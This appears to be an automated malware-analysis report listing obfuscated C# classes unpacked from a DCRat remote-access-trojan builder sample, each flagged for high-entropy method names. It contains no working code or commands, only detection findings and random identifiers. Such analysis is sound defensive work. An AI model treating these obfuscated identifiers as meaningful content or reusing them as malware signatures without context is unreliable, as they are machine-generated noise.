            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, WMM0Lumd6uwhVVio1lC.cs | High entropy of concatenated method names: 'jHR', 'B92', 'TrdEqGpdkP50TLUIWYe', 'yYsnUKpzZmEB0VcH08a', 'DcbfuNRH0wLoaedCxok', 'IigBVORAiKnX7DX6om9'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, jkaYrcIGc3fBw3eT0tG.cs | High entropy of concatenated method names: 'xakn3aYrcc', 'N2Xw1U02jUL28sQEpQn', 'k6pStZ0dGMGk91heag9', 'BFuiyP0sFhWpjSFJEyo', 'AQZB900k0GGTnRa99RM', 'Jp8OKZ0z5XOETS8sW2k', 'pTDFtfOHckNCs8YhDlp', 'GFebjMOAF80qKf9vX2Z', 'ycBkTaOVvD0OShduTkO', 'bTXZwbOqBMlAHE18TCn'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, kgU2L01xSqwEVNQawjm.cs | High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'M3Ku4CGuEOYkSoe2yqM', 'JvejMLGSZivfoffPYdI', 'rTGgdxGXhBRgjvCjakw', 'NvN2QTGoqgwxgiiqo3B', 'cibrYCGpsMyxl8ZaB60', 'ux7jq5GRZNMWm1yb7dj'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, OZEmyGmIOayneMgFHhS.cs | High entropy of concatenated method names: 'GPqO2UXOpe', 'dcPO6umq6M', '_8r1', 'DEGOsdMrBd', 'NK0OaSFR4o', 'fMIOu5fwM3', 'EjfOPJHv98', 'Bsx0gMSjuSrjB4VRZVI', 'ui78YUS0I4WY3oU0sZB', 'RFvWUgSOMybm9uuwWyY'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, PqLZKvmV9XAXm90IcWr.cs | High entropy of concatenated method names: 'WbNOteAVGr', 'm9LO5B6jFN', 'yA7OV1d9xt', 'iktOcyj7Rn', 'QaHO433t7K', 'CNHrl0SkpLja8rU3nxW', 'RqDFC7S2FR7AIap7v7H', 'yrgjM0SdRhPoTHV0Px6', 't3gM3HSzNhvrd87qwBF', 'GD4D2sXHRdsiw6Zxcrd'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, ktxd7lm7Ku4apr8eUvK.cs | High entropy of concatenated method names: 'ShUjgEiKmW', 'Mxw9CkpQFc9k42yXGhl', 'qvXDbCp33pwaitCR6es', 'gowVthpTqeJhAxYn5FC', 'WlKaBpp7JBwrV3qSS7q', '_1fi', 'Wg2kpTgQfm', '_676', 'IG9', 'mdP'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, e2u35lmjE2fSn6mMUxR.cs | High entropy of concatenated method names: 'XN8H6fBXqr', 'ggRHsBYPJX', 'eykHaU4vFA', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'WvtHu5Xc0R'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, jC5YDdYRWTYmuTqCgBB.cs | High entropy of concatenated method names: 'j1nJAyKLS7', 'X8aJRyygjN', 'ue4JO4RdUv', 'GtmJHEPFnv', 'a4VJk47tkC', 'y3tJj1pdIy', 'EiVJ3b69Zt', 's9OJrntv29', 'LcMJJUoAPp', 'OJRJTakh0v'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, mA6HgIIgOZBxSY3Ekw7.cs | High entropy of concatenated method names: '_0023Nn', 'Dispose', 'gkknGdEuJ1', 'bTMnBkeA6H', 'IIOn7ZBxSY', 'CEkngw7hoN', 'FB5nXncR73', 'BLXTOoOfASdHZ7rkgTG', 'RBTlRvO6C9vLhTRPcJJ', 'CEvL1vOG7G3MBLqve9G'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, r7i0W3fz2BIDP0XuyDI.cs | High entropy of concatenated method names: 'LtYsklEcPY', 'E2Asj99AIl', 'yUfs3mcfo2', 'DGolCpnX5jLHjNT7fbZ', 'cLd0b0noTXcS6D9EZZr', 'GatOtPnuOP9yABO06RG', 'R4OHcEnSJ6YHKiJ9oLi', 'be2SJ2npXXPIc5eXGgO', 'uXLxBfnRCcWeN4hYrcG', 'uHdHxLn1EAUUdrsE1Zx'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, aZnlhm1CAABsIa9RBQ2.cs | High entropy of concatenated method names: 'EJwIaXW42A', 'NnOIubpbjR', 'wYPVBrtc5Q2K2ug61DZ', 'MrwwJYt6VEeANJv8Doa', 'NTRlEOttkt09XfohFXG', 'hio4UptwbT7Gc8molDN', 'dSTQ6htYJqanOJr0fFb', 'SUKND6tJfHeVP6wtbqv', 'aJjc2FtML5N4pXdIgdb', 'BxV2j0tjfGy5WfgLO3K'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, srIwKrfPo6FATXUxSkB.csHigh entropy of concatenated method names: '_223', 'cgc9QePOZVnR3d1k26d', 'wy9vc2PBYxJGKBCdNMr', 'u0XPsTPZD91u1RFPKFB', 'V9TyHfPyHM47E5F2syu', 'xGEZEbPPiyyy2d68vib', 'htgJ2UPDHE5GWHdTtor', 'oedJQdPgZQKt7kccoBf', 'Vn4lN5P8wrMRLmmD2GP', 'DUPaFlPnhoUx24bMYYT'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, RZAd3wJJfGDG5KqnCW.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'ffIMOJ06G', 'XnZ5jVVZT6qwrPnSldY', 'q5x4a4VyHsBna1VCQNk', 'QcOJuSVP9CZ46oNPWTx', 'gMn6qSVDpm0aqC5I77D', 'skSfnyVg6FBG6ypoiwQ'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, HjYabonTIyjxbiXVBGl.csHigh entropy of concatenated method names: 'AN8AoN5ZNp', 'wuuAFQiPZe', 'ST7AWnKxFn', 'iCFA95NnHP', 'k6oAvKW7xu', 'k7rA8XGf9K', 'FsMNM7eWujE7CiZ8rSY', 'zUTOBie1oN5xcZnYJgk', 'asty0GemIqvPtjht94G', 'FsDW5peKLLlFJZyTO9b'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, EvMIiDYaSphYYhce8T7.csHigh entropy of concatenated method names: 'f4Z1oiaaCm2bg', 'DZxoq51Mlx5r19Aie2K', 'UerLZx1jeCPGBGnkYEK', 'Kjqrha105wRa2HbXq7k', 'XGt4NV1OFh1eohgKDbE', 'Rct8jH1B5ffZEvmj7Mt', 'oGt2OY1YM7PMVTOQYoa', 'n1wGWW1JeCLFACjRGga', 'BhwDBE1ZGPL5el9vkdv', 'XqVWmk1ygfqnHjpjRGN'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, hcK7ZnpIt8oXNoR1tX.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'N6Cxw1iMQLm8wDtdJEW', 'lQ102Oij0ejNjlKscLB', 'tnUYebi02LcFuJHiCYC', 'F2i0l7iOL5x1luqfGNG', 'd2jf38iBEElYqFrpy59', 'dDdUO9iZv0q3IN7yrSe'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, IM8Y0yfV22qvhg5kTZs.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'WwIPFWgYHx4byVr2Oma', 'cJjvrxgJ9VJOLTMwtJn', 'mp40EqgMTS4mVHiMdsD', 'c47BekgjB9eVVthL9gT'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, JSvtCM9rFJub9IZUnS.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'xj4qtciRgPKcw4hnJep', 'zyAxmji1fnHQtm1jquq', 'jXOmivimdRycNEX978W', 'FLdNuZiWTaZcmscJmeG', 'HR5sswiK64Prw6YbN2X', 'EjxvFlilUsQw0nNaZKa'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, U4xZGS164cWf1h1WGxW.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'hHpYBgGGFggemeCeWTq', 'Y0dt5lGxlh6GSwoijqs', 'unThmIGf9oiKixdnN3i', 'Hwl8myG64vx4XSf8aYP', 'QxTClRGtfkarlsDDLCS', 'uRukqhGcwhyJOAryZdq'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, EJRA9hmJvApynMht73d.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'moHHRidBtv', 'gPYHOt46DU', 'dFZHHFU4SN', 'mq0HkN1Aeq', 'wBmHjp5STh', 'rAIH3p9yll', 'GA1luyoedkbPQcAPMS3'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, dbRMeXQ575SOntb20Eg.csHigh entropy of concatenated method names: 'qsIP09rA2j', 'V9pPGUU2an', 'Ak5PBRkm1U', 'qGBP7inca6', 'aCuPgQb2ek', 'H36LBVNvglFNMOmiTEw', 'PNsWeXNEFlD8lyyHqXR', 'A4ufZENCcHEjZgnguo7', 'hB8HUoNb78xF4dwKCmN', 'dn1dw6NeCLeV6TZCqBv'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, LmSC3EI6jv3Pr2T55hN.csHigh entropy of concatenated method names: 'bjNfTqblQk', 'GT4f024FK9', 'uQFfGjqxWi', 'ykKfBv1aHI', 'UUDf7AJCNO', 'B1Efg3RBNf', 'XHtfX5PcKN', 'TXyhbQYnRe9U2XoOrcR', 'MMaWn5YgspJ3kjWw9il', 'uyY8p0Y8FlPvHnhAFMm'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, pXRCpH19vFMMQuFLeUx.csHigh entropy of concatenated method names: 'M91IU9OQ5W', 'rYmJegc9pRmLH8HhWNp', 'lb2iWbcGQmL9eHTJV2X', 'tccFqlcIJuYtXM6bI7e', 'EGZVe7cifjCAecvF7pN', 'pXNsJScxM6s4q1suTUk', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, nC1gEDfhZmYk9QTj1vI.csHigh entropy of concatenated method names: 'sg9', 'ofGMPvZqkC', 'RZa68BL7vs', 'SbeMDYFjfA', 'J0spPKgW43vSa9ig6qV', 'sC1aCrgK8Wwfufu3mXc', 'xuZXrHglL1vNP9kcb3E', 'mtSDhBg1Q4E9YWwEolj', 'mKcySygmwF3661WVBUI', 'TejAsKgUUYlHMgpS8W1'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, xOoR8N1HhDLW5mmEXKP.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'NSX20hxd3wR8UjWme4T', 'to8d8ZxzCE4jwvSKx0x', 'RMxgEkfHM55sa2CYSJy', 'V26Le3fA5HJa6GFTWSP', 'dV5OcVfVfXilBNokZdj', 'tvbcpafqvVGJtPJrvrY'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, nYKMMv1GLcBgbNJplvJ.csHigh entropy of concatenated method names: 'AlR1Fr5oaU', 'Jb0sta6nvj947ZHOaYo', 'SWsdVv64GKEm1e9kdZL', 'fX49MM6g8RX9Acyl36J', 'qhlMJj68dAQiwCc5UTg', 'XjYp9M6NEBD1fQ7iFFm', 'QLw', 'YZ8', 'cC5', 'G9C'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, yQ5WGN1Y6EM87nG9LHI.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'cNIEEM95nX3FJlLZugV', 'fDEpLR9sGOSSEvkrGTi', 'TMpRyW9kjpikJKkykem', 'sUtGVJ92yHYZIilquOP', 'of4hQm9dBqwbv9OAVyw', 'TmO2lk9zVqI7QGq9w2d'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, W4WPSscSdKwTg6HOgj.csHigh entropy of concatenated method names: 'CstAndi1w', 'BZkRDZ6XI', 'lbaOKSunj', 'OT5HGpnEc', 'fl5kKabUB', 'rGwjUFYoY', 'xNR35IwfR', 'XVdbc3Axr3mNnikaOv9', 'U2IflCAffMg5oors7pW', 'nUpjr2A6MFtjjGrSWWb'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, uWENbonr8jd1tIAS1xn.csHigh entropy of concatenated method names: 'CvxAdv7Hq1', 'gKHAiCXYkU', 'LR8AwfngFw', 'hHim39eSeYNMFeUU8kO', 'pdibRleLY5VcwkOgAvO', 'dM41eyeuXcHRkJbZ9PT', 'jKrYWPeXGjTp8cyVo7v', 'wYVT51eokogZFb3OGB9', 'lKixj8ep8UNxdeFCUcX', 'xHAN6teRE8rJRo71WQY'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, jE5WtPml1RdQjdFQ8DA.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'YVe36uBscA', 'FV13sNS1ip', 'nFr3aXIbYS', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, iROHQ3mmEIfL5S674q7.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, yWutIw1jxXL5qX4CDYU.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'FvbnJXfEI3kdZRkJAYQ', 'BcwGjNfeuWgHgxc0fk6', 'VhCPMYfL1Zrxnk5TLME', 'O7ZiQbfufBpeJpqsc0C', 'e9MkMdfSwgZSEF4dYWU', 'YDiYhQfXkG3oafd4wQF'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, H7npMFILkHSORxw2N45.csHigh entropy of concatenated method names: 'HxOfzW04Ao', 'SyyQZJuFAf', 'dL2Q1hYJGm', 'f9kQIoCKW6', 'vSQQffZLyX', 'yCpQQHvFMM', 'duFQnLeUx5', 'DU9QmJg36L', 'ARhQYCqrb9', 'f5uQ2U70Hc'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, rQuI3Fm0ST2JYPvCrjv.csHigh entropy of concatenated method names: 'JN41JVpIZESMcdZ3EbH', 'acIbnTpipqyx6Ul6tT2', 's2yX9NpVtplZ0rK2odG', 'Ut91mwpqeWMX102mIcu', 'ovmHGFPu5D', 'WM4', '_499', 'UEyHBlXkqw', 'ussH7OQju6', 'hNJHgR9lIm'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, CudyvdfljsVS7HSNSDB.csHigh entropy of concatenated method names: '_5u9', 'NSoMmYZ9Ja', 'VbqsZWovWm', 'fUJMxvrwqP', 'ncPZjKgkkJvPEK5KrYI', 'afKcfgg2AUN4qQ6gLvK', 'sAQg86gdVX2A1LWERcW', 'KGR2Lwg5U553O4eFoQP', 'eFhx9Sgs2mDwbCQ51V0', 'kewxoqgzySOfltPMIyW'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, GvNNiUIcgHqlnAdBYvR.csHigh entropy of concatenated method names: 'U04Q5L7XgJ', 'syuQVOSMHG', 'lWqQc9N5wI', 'oGSQ4WI0BB', 'rO3QAUI9Lg', 'WjXkAojH8Raa2BD7mnf', 'Is2h10jACVqouXJaUaF', 'Wy7kryMdBFyhkiMwOau', 'CZ2SapMzPfwC3p5W79F', 'yJgQwXjVxmdQSPgD1j3'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, kkt7FX1bTdGrWt8uukE.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'NgLQk7GajK8kdI9lH18', 'D279kvGrKsfpYwPjpak', 'FliTSiG5YipVfe3It5l', 'FSlt61GsWUiLgao1Lyw', 'AauqyaGkFij4T1Vo2eh', 'pNGao2G27dYZFhj469v'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, CrJ9sxQwgB4PfARRM97.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 've8xKT7Mju', 'LhPxbdQMXx', 'r8j', 'LS1', '_55S'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, xBCaIw1PrVcGNtTJjiy.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'zeH0aFGFKpdb6mT6tMs', 'lXRwuWGToHlYR51hFWB', 'DhorAQG7LLgJxHrDNQO', 'YxfuPyGQaLoduGhnQim', 'ey5eGmG3VrbKfc0bqyH', 'sNbodMGhMM9phQAgC81'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, ePmEV1Qai31JfgSSjPc.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, Bb5GXlIDVThxamtP6hu.csHigh entropy of concatenated method names: 'jy1YRgCnfq', 'Y7VN6qBlCwp9jmMo0yr', 'yJC97qBWmpDpofvubDu', 'zNJi6yBKiTtxS2SqbIH', 'OleQGOBUM53ggSKKG3b', 'fvOddNBavF5G5p2gcZW', 'm6bYL5OZ5R', 'fuFYU5Vstn', 'gyEYtaNykF', 'C0rY5IPfS5'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, RKPtI7gYJ7pJMkgXQi.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'c6ZMD4qEdyIpOKiRCHi', 'G4gUamqe21KUB7qcELI', 'IXnwfBqLUmpksZhUhjR', 'SD4Q1LquGZ2XcoYvDe2', 'KKdKiJqSRah6ru3gcIu', 'UDhfVhqXdPIfqM9RIKw'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, xDsoNACsu1IqjwB9wn.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'ly2hSfIpWEjdGu0bNZv', 'DCiWqoIRgykAD3lTeyk', 'ObvCWvI1K64NBN7SrSb', 'DVaksvImNSaOQk2wg30', 'zLRoWvIWE8eWwFUTG40', 'dG7N5RIKohoHoL8yuTB'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, CnaXDB14wxBIrIZiguf.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'DVyBqDxvihxy7xGlKIN', 'XtiO4MxEsmvF8jdB6he', 'vWjpOLxelhS0O3B85OV', 'cWgr4CxLTBilk3QviNl', 'wGpPhKxuQAI31Wuwkj5', 'RS45aDxSf4t9iv8FRxC'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, hankk5m4Rkm1UNGBinc.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'JjnOAF5GHQ', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, DdoalDfiXXD3LHp9Zhr.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'hQjMYHDlI8', '_168', 'JDyIOS84pZRU5Hn2fv2', 'vEoAMY8NnesYA6Nknm8', 'dfkXY98FasmyqPu2cyn', 'gfCx0Y8TUIarYgoooH3', 'j6b5OG87uD9NfW8ccOQ'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, hSwbFVnDmHlHbvG6PrZ.csHigh entropy of concatenated method names: 'Be2Rkaxb63', 'WOMRjbOgnZ', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'dbGR3gCCfS', '_5f9', 'A6Y'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, uWuIqeQAZNYWthMp4Xd.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'rQueZI3FST', '_3il', 'hJYe1PvCrj', 'WA6eIaE0u3', '_78N', 'z3K'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, Im7ZDNQn5VoMVrI6R5M.csHigh entropy of concatenated method names: 'r4MuyBDm66', 'yOx3Zx4B8ZONk3bKouc', 'TLsCUO4ZVXCsERrsXgP', 'H44vvV40REBJiKxrgVD', 'CE69ax4OQXGq4ZH44UE', 'NYGsrekW7b', 'q95sJ2kqka', 'iCVsTHZUIG', 'l4Ms0AuSGp', 'T3MsGhLVvI'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, CYToTgQyhRFm7TNLLpg.csHigh entropy of concatenated method names: 'VYtPQ6Nnwm', 'VuIPnqMaVj', 'WguPmoIVYv', 'lm94rXN04Wgi9cmw62k', 'WnTlW9NOOORES4PsqZw', 'PrHJ3pNMOmlS3h8j3Aq', 'cMjII4NjCaOrQqvyP3x', 'bUltg6NBfCylMsYdQi4', 'FreoRvNZVZA1dqmWUw9', 'pm9MUuNyNhuArkrgCBd'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, nuDRoJnot1hl1avl76U.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, XnpTgxmRiFAVyjFFh2q.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, VhMPml118mpaPsrmrrj.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'JsFHKK9ZIWOBYm5ctw1', 'l0HmIB9ympCEBpIfDHa', 'D1h8qC9PeGdbnoFIkZT', 'nISSkH9D1VOciGUpIbS', 'MFIH3Y9gpIhVVoDuYKh', 'dGX0h498qwOITVsEGZH'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, SA4pyvmHmu95oRQLWuO.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, cKxDIp1DR30LvuIFl08.csHigh entropy of concatenated method names: 'BHqIcD56F4', 'nZGI4S4cWf', 'bh1IAWGxW4', 'ut8RuyctD6AVwttrL89', 'SvxSGFcfoSsbWlc6RJp', 'poHgWTc6AgndVNKpY9K', 'ABqB5PccyXsq3MEXrjc', 'AXNidScw24alUX7RUYX', 'vrqyKscYHTWOsfiIRQU', 'bcXuDRcJ1cIm3fqfYm5'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, DDiUNFMO93Kf5vcXdy.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'cbXKbyqsconiveeGDJL', 'wruNafqky1AIk19MTAK', 'tJoVwvq2Z7fOroG1O93', 'AU5uq4qdWWau2u5ugG9', 't2sb8sqzXpVgltbvmVo', 'P70yqfIHuGiHZQgedIt'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, DyanhGfst51QiCfKYHj.csHigh entropy of concatenated method names: 'DQE20dbBxM', 'fjQ2GXwCRI', 'pm12Bf3KVf', 'Y9UTVmPJmLONSuswP4p', 'MIOxQuPwNmrf8iJ4Nto', 'dZiXrHPYlZGKh3oYMHL', 'CbQ4nRPMQ65y4hQZFe8', 'zRu2KdwlI9', 'lqv2bqlCV2', 'AhJ2y3bHGS'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, SigsX8Q91chQ8FtG4Ji.csHigh entropy of concatenated method names: 'xA5KRGNhLy', 'edCKHBS6M3', 'hGtKea94C4', 'WtEKxl37kx', 'cFFKKr1530', 'iG2KbVjTYB', 'MfqKyxehQS', 'W8PKNSIpos', 'wPoKLPOL0W', 'C0IKUKWRY3'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, blBAitfAgFSYhWNYmHM.csHigh entropy of concatenated method names: 'F7p6TF7qxj', 'SiJ60jO67l', 'VQIaZrgBmyf3eRuoI1k', 'pMLI41gZlfD5s0VIZDR', 'IP8Wuvg0GnAbCu3a7u9', 'TmdNv2gOfywmkuyotBa', 'VhTmZOgypf65B27d48A', 'oe3ODJgP7XBVGf2kJ33'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, lXmetBmZ2od6uQ9gUad.csHigh entropy of concatenated method names: 'yHxRq0GjmW', 'p1KRCIwfiv', 'SMPRdcykyq', 'E5nRiYrwGQ', 'HLVRwZw02j', 'hw8Rpdi1cg', '_838', 'vVb', 'g24', '_9oL'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, CL54OdIjQEdrBnVnMYU.csHigh entropy of concatenated method names: 'saOQ85b3vn', 'PMIQDBMSn1', 'F9bQzYre3n', 'YaBnZentHB', 'D1pn12gGsD', 'k9XnIDrHqW', 'gubnfoyO4K', 'HlhnQYd45s', 'NRXnneGvNN', 'NqGVamj5KWe36qHogRj'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, HRH21JQ6vUHB00EaoFM.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, ig8uZN1RMFOwLpVfVAB.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'qMY02RxmJ8OL04MFIrO', 'IJwSBoxWOXIaG3DYt1g', 'tLqKPyxKiEDfJVDSg2q', 'RKQ9gsxlXyMg5EKZhqv', 'BhGnXdxUNVh4R6Y09AH', 'fRZgaYxaQM25BJYegvx'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, EXZU6Gf9nBtdEdOZAkc.csHigh entropy of concatenated method names: 'DC1TKSnewQCAFAEka0F', 'Q9F2w0nLFNwOraRsX38', 'lm7twAnvwHmBAiLroaq', 'dutuT5nEvjJPvEO6XMX', 'IWF', 'j72', 'yM9sy7xlDZ', 'UCqsNFTufh', 'j4z', 'yP3sLTC0WU'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, pOpLyPfFxqHRudwlI9P.csHigh entropy of concatenated method names: '_269', '_5E7', 'egmMpWE2nF', 'Mz8', 'QctMtV4Sh4', 'ms0nq48UEM3Zn2oyFZt', 'RHDUpI8aEeNWkfBEYej', 'hgx2jJ8rnk0PuTG9ihO', 'adrYji85ALRuPiXe0YW', 'mX2y1f8sXQvPsMUQeBL'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, dFjqxW1SiRkKv1aHIWU.csHigh entropy of concatenated method names: 'uUfI1xTCku', 'ly8IIt3WU5', 'qihIfULWf4', 'ovm1Xo6UUvTJqHIDfw8', 'oCeayi6aw7pxgenxSAw', 'etsFF76KnLM89hHha3b', 'rP4PYD6l1FB8P0H5enG', 'CYpuHm6rhG6pAB9dASZ', 'Fvmged65M8Tg4NDO6Nm', 'HaZ8dC6sZElJJtuGVnQ'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, ToD7ohIZAXIUo6hgCXv.csHigh entropy of concatenated method names: 'ePFIRruqKv', 'PaxIOQiKjc', 'OvSIHKO7wq', 'bKoqDecCQqLldv3DM3C', 'B8waWmcbCdXumD6BHjl', 'Vq1cWkcvpZwusjTfjs3', 'mwlO79cEfhnYtU0Y97P', 'hLu83JcejPSydaiAkxU', 'gcRYiMcLQlmB7wcPp1A', 'uwKkRjc3dUVmWZ2GZwL'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, BbYTgtQLihEIjiYLvDZ.csHigh entropy of concatenated method names: '_7zt', 'KpTPUlc4jF', 'jhVPt6f2Li', 'Fp2P57wZcV', 'UUQPV7FVac', 'TM5PcVjnWi', 'RupP4s96Cx', 'y9vBOGNgFnQyOfVEHkr', 'byOq6kN8CXPMDMlkWAo', 'eTcSeUNPG1XIDMFedQX'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, j9LrO9fbJnnDePiDox5.csHigh entropy of concatenated method names: 'KVD2i9Fb4X', 'y192wLvR6t', 'STn2pPmEV1', 'NDuBlBP12rA5tjQieZX', 'S07fSbPmbP70LqmNAtx', 'Bj7DwXPWZcEFdq6mPTB', 'PR8Ij9PKNtcKSlovNeq', 'QUZ7duPlHWOqhLsOGDm', 'yVoKqaPU4JyWPshEKE4', 'aL6LQ3Pa2Uwhx08iedT'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, yBRtMgf1hAkErtdsSdS.csHigh entropy of concatenated method names: 'KBqY3YAcqo', 'kwoYrepGrJ', 'hfJYJNF6kn', 'nH1YT3m2kj', 'DhIoQqBzqpOqfIBHRwa', 'CQGWypB2WxdXQGRHnLo', 'nIcNDGBdg3O9BgusJQx', 'T2GfkwZHb8s3oDO16v7', 'GHdrqPZARP03eqIjUCr', 'smKUIdZVuj6jMtUHBEG'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, uxL8lxfUvgFnXycRaue.csHigh entropy of concatenated method names: 'xex6K3wQQb', 'xMe6bX75SO', 'etb6y20EgO', 'g8nki9DpZ6byqCVKEeG', 'E2uM9uDXOwxiJypj9Qk', 'HnNicpDodfOlyEUwnn1', 'OcdF72DRTKu55FZXJIB', 'OrY6mToTgh', 'yFm6Y7TNLL', 'Sgx62Gd9Qk'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, BHmp2TkGJbLvp37Hiy.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'dbicqoVtUP3ZR6gCJEI', 'AIboB4VchFh6wAFmkML', 'DKgYrUVwG8JZcXtJPcv', 'mmmQptVYDwbjK92kquE', 'MbnR2BVJ7Si4YuHG6sr', 'C0IAUmVM3NjuRDti870'
